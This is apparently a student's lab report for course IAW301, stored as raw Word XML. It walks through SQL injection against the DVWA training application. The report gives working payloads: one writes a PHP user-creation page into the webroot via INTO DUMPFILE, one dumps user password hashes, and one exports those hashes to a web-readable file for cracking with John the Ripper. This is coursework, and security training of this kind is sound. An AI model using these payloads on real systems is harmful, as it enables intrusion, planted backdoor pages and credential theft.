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6803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2A8DD976" w:rsidR="00EF7CE6" w:rsidRDefault="007C4A19" w:rsidP="00EF7CE6">
            <w:r>
              <w:t>IAW301</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E002FFA" w14:textId="7A75EA73" w:rsidR="00EF7CE6" w:rsidRDefault="00C310EA" w:rsidP="003A0FAA">
            <w:r>
              <w:t xml:space="preserve">Lab </w:t>
            </w:r>
            <w:r w:rsidR="009C4EA0">
              <w:t>28: John The Ripper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A9E514C" w:rsidR="009E0AE3" w:rsidRDefault="007C4A19">
            <w:r>
              <w:t>Nguyễn Đức Kiên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214D321C" w:rsidR="009E0AE3" w:rsidRDefault="007C4A19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39A2C542" w:rsidR="009E0AE3" w:rsidRDefault="009C4EA0">
            <w:r>
              <w:t>November 19, 2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="723E9EE2" w14:textId="77777777" w:rsidR="009E0AE3" w:rsidRDefault="009E0AE3"/>
    <w:p w14:paraId="117DB8E7" w14:textId="56467E1B" w:rsidR="00114D5F" w:rsidRDefault="00C310EA" w:rsidP="003A0FAA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Exercise 1.1 </w:t>
      </w:r>
      <w:r w:rsidR="009C4EA0">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Section 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1866FAC3" w14:textId="5AF022A6" w:rsidR="00603351" w:rsidRDefault="009C4EA0" w:rsidP="006967A5">
      <w:r>
        <w:t>Log in to DVWA and head to the sql injection vulnerability section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496E12F2" w14:textId="3CEFEDEE" w:rsidR="009C4EA0" w:rsidRDefault="002E75C4" w:rsidP="006967A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B879655" wp14:editId="0A0778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3C82" w14:textId="77777777" w:rsidR="009C4EA0" w:rsidRDefault="009C4EA0" w:rsidP="006967A5">
      <w:r>
        <w:t>Inspect the input field of userId and edit to 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A20BCC8" w14:textId="54B97898" w:rsidR="009C4EA0" w:rsidRDefault="009C4EA0" w:rsidP="006967A5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E75C4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A544378" wp14:editId="7CC0DD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0F80" w14:textId="77777777" w:rsidR="009C4EA0" w:rsidRDefault="009C4EA0" w:rsidP="009C4EA0">
      <w:r>
        <w:t xml:space="preserve">Paste this to the User ID field: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE5798B" w14:textId="0198048F" w:rsidR="009C4EA0" w:rsidRDefault="009C4EA0" w:rsidP="009C4EA0">
      <w:r w:rsidRPr="00F565C1">
        <w:t>' union select null,'&lt;?php if(isset($_POST["submit"])) { $userID = $_POST["userID"]; $first_name = $_POST["first_name"]; $last_name = $_POST["last_name"]; $username = $_POST["username"]; $avatar = $_POST["avatar"]; echo "userID: $userID&lt;BR&gt;"; echo "first_name: $first_name&lt;BR&gt;"; echo "last_name: $last_name&lt;BR&gt;"; echo "username: $username&lt;BR&gt;"; echo "avatar: $avatar&lt;BR&gt;"; $c</w:t>
      </w:r>
      <w:r w:rsidR="009C0FD7">
        <w:t>on=mysqli_connect("127.0.0.1","</w:t>
      </w:r>
      <w:r w:rsidR="00E625DB">
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00F565C1">
        <w:t>","","dvwa"); if (mysqli_connect_errno()) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } else { echo "Connected to database&lt;BR&gt;"; } $password = "abc123"; $sql="insert into dvwa.users values (\\"$userID\\",\\"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$password\\"),\\"$avatar\\"</w:t>
      </w:r>
      <w:r>
        <w:t>,null,null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F565C1">
        <w:t xml:space="preserve">)"; if (mysqli_query($con,$sql)) { echo "[Successful Insertion]: $sql"; } else { echo "Error creating database: " . mysqli_error($con); } mysqli_close($con); } ?&gt; &lt;form method="post" action="&lt;?php echo $_SERVER["PHP_SELF"]; ?&gt;"&gt; &lt;input type="text" name="userID" value="33"&gt;&lt;br&gt; &lt;input type="text" name="first_name" value="John"&gt;&lt;br&gt; &lt;input type="text" name="last_name" value="Gray"&gt;&lt;br&gt; &lt;input type="text" name="username" value="jgray"&gt;&lt;br&gt; &lt;input type="text" name="avatar" value="Just Hack It!"&gt;&lt;br&gt; &lt;input type="submit" name="submit" value="Submit Form"&gt;&lt;br&gt; &lt;/form&gt;' INTO DUMPFILE 'C:\\xampp\\htdocs\\dvwa\\create_user.php' </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">--  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF38192" w14:textId="16008A99" w:rsidR="00E625DB" w:rsidRDefault="00E625DB" w:rsidP="009C4EA0">
      <w:r>
        <w:t>And we have this after press the submit button</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBC73C6" w14:textId="097A7530" w:rsidR="00E625DB" w:rsidRDefault="00E625DB" w:rsidP="009C4EA0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1565C18B" wp14:editId="39580A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D08" w14:textId="0F57FD90" w:rsidR="00E625DB" w:rsidRDefault="002E75C4" w:rsidP="002E75C4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now we go to </w:t>
      </w:r>
      <w:r w:rsidRPr="002E75C4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>http://192.168.234.129/DVWA/create_user.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C21A36" w14:textId="0A6CB476" w:rsidR="002E75C4" w:rsidRDefault="002E75C4" w:rsidP="002E75C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0753BE7B" wp14:editId="4F8E4EC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4E26" w14:textId="12A5B406" w:rsidR="009C4EA0" w:rsidRDefault="002E75C4" w:rsidP="006967A5">
      <w:r>
        <w:t>Submit new form and we have:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0991DBC7" w14:textId="5D016153" w:rsidR="002E75C4" w:rsidRDefault="002E75C4" w:rsidP="006967A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18FF92E8" wp14:editId="24E779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78C" w14:textId="5E32943F" w:rsidR="006D5014" w:rsidRDefault="00C7618D" w:rsidP="00C7618D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 w:rsidR="007C4A19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidR="002E75C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Section 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14446B9D" w14:textId="77777777" w:rsidR="002E75C4" w:rsidRDefault="002E75C4" w:rsidP="002E75C4">
      <w:r>
        <w:t xml:space="preserve">Insert this to the field and submit: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE10F53" w14:textId="77777777" w:rsidR="002E75C4" w:rsidRDefault="002E75C4" w:rsidP="002E75C4">
      <w:r w:rsidRPr="00F87042">
        <w:t xml:space="preserve">' union select null, concat(first_name,0x3a,last_name,0x3a,user,0x3a,password) from users </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E0F8D" w14:textId="6F1E86D5" w:rsidR="002E75C4" w:rsidRDefault="002E75C4" w:rsidP="00C761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C7D543F" wp14:editId="02E3C8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8624" w14:textId="77777777" w:rsidR="002E75C4" w:rsidRDefault="002E75C4" w:rsidP="002E75C4"/>
    <w:p w14:paraId="0CB16295" w14:textId="34930877" w:rsidR="002E75C4" w:rsidRDefault="002E75C4" w:rsidP="002E75C4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Then insert this :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1FA1E8" w14:textId="7411C0FF" w:rsidR="002E75C4" w:rsidRDefault="002E75C4" w:rsidP="002E75C4">
      <w:r w:rsidRPr="00F87042">
        <w:t xml:space="preserve">' UNION select null,concat(first_name,0x3a,last_name,0x3a,user,0x3a,password) from dvwa.users INTO OUTFILE 'C:\\xampp\\htdocs\\dvwa\\dvwa_passwords.txt' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n' </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">--    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A0C619" w14:textId="40384F23" w:rsidR="002E75C4" w:rsidRPr="002E75C4" w:rsidRDefault="002E75C4" w:rsidP="002E75C4">
      <w:r>
        <w:t xml:space="preserve">Submit and go to url : </w:t>
      </w:r>
      <w:r w:rsidRPr="002E75C4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>http://192.168.234.129/DVWA/dvwa_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC01061" w14:textId="54494D0F" w:rsidR="006D5014" w:rsidRPr="002E75C4" w:rsidRDefault="002E75C4" w:rsidP="00C7618D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28917B64" wp14:editId="3CFD6E8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B9F1" w14:textId="12399FA8" w:rsidR="00DA6CDF" w:rsidRDefault="007C4A19" w:rsidP="00A674E7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>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00C310EA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E75C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Section 17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7462E68F" w14:textId="7B439819" w:rsidR="00C7618D" w:rsidRDefault="00DA6CDF">
      <w:r>
        <w:t>Move to second computer and run the following command to get informations from dvwa_passwords.txt of the windows 7 computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2EF2C9" w14:textId="1B503DB9" w:rsidR="00DA6CDF" w:rsidRDefault="00DA6CDF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AC4D346" wp14:editId="2E0C3C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A8B" w14:textId="2B44462C" w:rsidR="00DA6CDF" w:rsidRDefault="00DA6CDF" w:rsidP="00DA6CDF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>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>4 Section 18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705CA1AB" w14:textId="750D6DDF" w:rsidR="00DA6CDF" w:rsidRDefault="00DA6CDF">
      <w:r>
        <w:t>Using John The Ripper to crack password_dvwa.txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3CE74B" w14:textId="4A45F219" w:rsidR="006803CE" w:rsidRDefault="006803CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="786589BD" wp14:editId="7FD41D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92215"/>
    <w:rsid w:val="002644F3"/>
    <w:rsid w:val="00271DB4"/>
    <w:rsid w:val="002D6C11"/>
    <w:rsid w:val="002E75C4"/>
    <w:rsid w:val="002F5321"/>
    <w:rsid w:val="003A0FAA"/>
    <w:rsid w:val="003B52AB"/>
    <w:rsid w:val="003F6E66"/>
    <w:rsid w:val="00484DC9"/>
    <w:rsid w:val="0055509E"/>
    <w:rsid w:val="00562298"/>
    <w:rsid w:val="00572197"/>
    <w:rsid w:val="00603351"/>
    <w:rsid w:val="006803CE"/>
    <w:rsid w:val="006967A5"/>
    <w:rsid w:val="006A17F2"/>
    <w:rsid w:val="006D5014"/>
    <w:rsid w:val="006E6602"/>
    <w:rsid w:val="007559DC"/>
    <w:rsid w:val="007C4A19"/>
    <w:rsid w:val="008A7CB3"/>
    <w:rsid w:val="008B03F0"/>
    <w:rsid w:val="00910A4F"/>
    <w:rsid w:val="00980F38"/>
    <w:rsid w:val="009C0FD7"/>
    <w:rsid w:val="009C4EA0"/>
    <w:rsid w:val="009E0AE3"/>
    <w:rsid w:val="00A46064"/>
    <w:rsid w:val="00A674E7"/>
    <w:rsid w:val="00AB46D2"/>
    <w:rsid w:val="00B42E10"/>
    <w:rsid w:val="00BC3BAB"/>
    <w:rsid w:val="00C310EA"/>
    <w:rsid w:val="00C7618D"/>
    <w:rsid w:val="00D204C7"/>
    <w:rsid w:val="00DA6CDF"/>
    <w:rsid w:val="00DC7981"/>
    <w:rsid w:val="00E46306"/>
    <w:rsid w:val="00E625DB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310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310E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D5014"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002E75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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-19T18:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-20T03:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>